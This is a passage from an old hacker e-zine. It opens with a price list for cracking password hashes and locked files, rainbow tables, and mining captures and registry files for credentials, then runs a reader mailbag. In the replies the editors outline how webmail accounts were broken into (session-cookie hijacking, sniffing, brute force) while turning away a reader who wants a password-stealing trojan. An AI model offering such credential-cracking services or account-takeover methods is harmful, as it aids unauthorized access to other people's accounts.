-cisco pix-md5
-pwl files
-ms-cache
-ntlmv2
-lm
-ntlm
-cisco type-7
-base64
-remote desktop

file prices:
-$5 for pdf files
-$5 for zip files up to 10 chars ($1 more for each char)
-$10 for rar files up to 10 chars ($1 more for each char)
-$10 for any office file (ms word, excel, etc.)

rainbow table prices:


-$15 for any table up to 10 characters + $2 for each additional character
-or
-$2 per character

registry analysis
-$30 for any .reg backup file.
-we find the guids, clsids, passwords, usernames, and other needed info.

network dump analysis


-we can analyze network dumps (tcplib) made by sniffers such as ethereal.
-we will give you visited web sites, passwords, usernames, routers, mac addresses,
etc.
-$20 for any dump up to 10 megs. $1 for each additional 2 megs.

daily proxy lists


-$5 a month to have hundreds of socks proxies delivered to your inbox every day.
never search again.

########################
# mail.box #
########################
from: megahertz
"hey, i was going threw some of my old files i saw tiz, was wondering if your
still making it or not? since darkassassins whent down i havnt been on irc much.
are you still active on irc and do you know if darkassissns will be back up or
where the old people left to ?
talk to you laterz,
megahertz"

from: tiz to megahertz


"dear megahertz,
yeah, tiz is still around. we are in the process of getting issue 5
ready and it's been a while since issue 4. i don't know what happened
to da and it seems as if nobody is in irc anymore. easyex said he was
renaming it, but then his site got hacked and i think it may have been
the last straw for him. kazm is contactable through xxx@xxxxx.net (i
think). as for easyex and the rest, i don't know where they are. if
you find anything out, please tell me.
lates,
sheep"

from: rick
"i read in a post that you made that you thought that it would be a
while before yahoo mail
or hotmail would be hacked. i just kinda wondered what the old holes
were that led to
the previous hacking. it seems like though that there are always very
ingeneous people
attempting what others say is impossible and that then the break
happens somewhere down the line. what is it about the new way of
logging in that makes it so bulletproof?

also are you aware of any really good ways to prevent screen capture trojans?
aka bossware? it seems the most likely shortcut is a trojan. the
only way i really trust
any thing is to use a live cd version of linux. it seems that there
will never be any secure winholes installation.

sincerely rick"

from: tiz
"dear rick,
the most recent hotmail hack was done by cookie and session jacking.
an attacker would create a cookie on their machine that made it look
like they were logged in under another account. i think a hacker from
europe was the first to discover it. traditional mail system hacking
up until the 90s was through sendmail exploits. sendmail is the daemon
through which mail was sent. it is still sent this way, but it's a lot
more secure. as far as modern email hacking goes, the password is
usually cracked through some other service, pharmed, phished, or
guessed. lots of people sign up using accounts at dodgeit.com.
somebody could farm their rss feeds for passwords and could always
recover a lost pasword. also, until mail services starting using
https, the password could be sniffed fairly easily. another good way
to get the password is by guessing because most people use insecure
passwords such as their name, account name, birthday, etc. lots of
times the password is brute forced or cracked using a dictionary via
the instant messaging system. the im server usually has quick
responses and it's similar to cracking htaccess. to be honest, the new
systems aren't bullet proof. luckily, most email providers have a
lock-out feature to stop brute force attacks and most are starting to
implement ssl. some email providers like shinyfeet.com use
pre-packaged email management programs. exploits are released very
often for these thus, they become insecure.
the best way to stop all trojans is with a firewall/anti-virus
combination. personally, i like agnitum outpost firewall but for
people who wan't extra control i suggest blackice. just block all
programs you don't approve. your firewall will ask if a program can
access the internet. if you don't know it, then block it. always check
your firewall to see if any programs are "listening". they show up as
a connection to 0.0.0.0. all trojans "listen" so they can communicate
and recieve messages from the controller. of course this won't keep
you 100% secure but it will block out 99% of trojans and keep the
skiddies away. for anti-virus i use avg from grisoft. it's good free
software.
if you have any more questions, feel free to ask them.
later,
sheepbyte"

remember the guy from issue 4 who wanted us to hack a game to get his accounts
back? remember when we told him to fuck off? well, it didn't work

from: i.r.m. i.r.m. irm1902@hotmail.com


"yo man . do u know how to set a trojan that if some1 downloads ur thing that u
want them to download they get the trojan and how do i make it so the information
gets sent to me..( i need some1 passowrd)"

from tiz
"i thought my first reply would have scared you off but you still
persist in your stupid how do i hack hotmail questions. hacking is not
about stealing passwords. go away."

from irm1902@hotmail.com
"this is soo not about hotmail lol its about big real life money lol. i was
thinking of geting around 3000-30 000 $ lol but if u dont wanna tell / u dont know
it will be harder for me. its just i was victim of an act like that when i
downloaded something then a password from my game was stolen. and the game i am
talking about is not just normal online game . some staff there is worth alot on
eaby and my main target is virtual money thats called "gp" . i have a program
already that can make me 10$ a day but i have a shared computer so i can use it at
full potential and the worst of all i can't play cuz my bro deosnt alow me to play
, he thinks my game slows down internet and it sooo does not becuase i play at
lunch sometimes and he doesnt know and internet is fine. so its about hotmail its
about good big money and i am begging u 2 help me"

from: tiz
"uh... didn't i just tell you to leave? hacking isn't about stealing
passwords or accounts. get a life."

hopefully he won't be coming back for more abuse.

from: riyad h4ck


"hey my man wassup ?
well done with what u did with nasa , yeah have a nice day , well done again
hack tha planet"

from tiz:
"thanks. issue 4 available at:
antidote.kazasena.com
tiz issue 5 comes out in october!"

from lance:
"are you still needing aol cd password?
a good place to get them is blockbuster video, or some
place like that. aol sends them a shipment of cds to
passout. they will let you take as many as you want,
they dont want them anyway."

from tiz:
"thanks, and yes i still need them. if you raid a local blockbuster or
have some sitting at home be sure to send them to me.
laters,
sheepbyte@tiz"

from oliver:
"sheepbyte,

i am in interested in obtaining contact details for "quentin", erik bloodaxe


(chris goggans)
and doc holiday (scott chasin). the three people listed are/were computer hackers
and were well
known in the scene in the early 90's. i have made lots of enquiries to many
people, but no one
has been able to provide me with any information.
if you could help me with this enquiry or provide me with a name and/or address
(postal or email)
of someone who can, i would be extremely grateful as i know you are very busy.

thanks

ol."

to oliver:
"oi,
i unfortunately do not have the contact information for any of these
people. are you doing journalism? a school report? lots of the old
skoolers aren't available for interviews because they don't want to be
harassed. i really don't know where to direct you. you might try
contacting phrack (phrack.org) or the cdc (cultdeadcow.com).
lates,
sheep"

note: we recieved 3 emails from this guy. we think he crawled the hacking sites
and emailed every person he found or something.

from uc:
"hi
was readin the tiz article and found it intresting in the google information
mining,
and was wonderin if there was in anyway i could contribute and become a part of
it.

cheers

uc"
from tiz:
"there are several tiz issues you could be referring to. if you find
any information using google, then feel free to submit it to us. also,
we are building a database of neat google queries, so if you make any
be sure to email us. any tips on the process would be appreciated (why
not write an article?)
once we get the site up again we will have a google mining section
with various projects you can participate in.
sincerely,
sheepbyte"

from wonderous treasures


subject: hacking
"can u please tell me more... thanks!!!!!im really broke..."

from tiz:
"don't hack for money. it's un-ethical and you'll get your ass in jail.
have a nice day,
sheep"

shouts to:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~snags runs digital-deception.net check him out. ~
~proge thanks for the hosting!!!! ~
~kazm where are you man? sheep wants to get in touch ~
~bluekeys where are you? drop us an email ~
~xplicit again, where the hell are you? ~
~truecrypt you make some very important software. keep up the good work. ~
~34109 you know why *wink* ~
~easyex uh.. contact info... please? ~
~cypress sorry to see you go ~
~digg.com you guys rock ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"those who sacrifice liberty for security deserve neither"


-ben franklin

[end of file]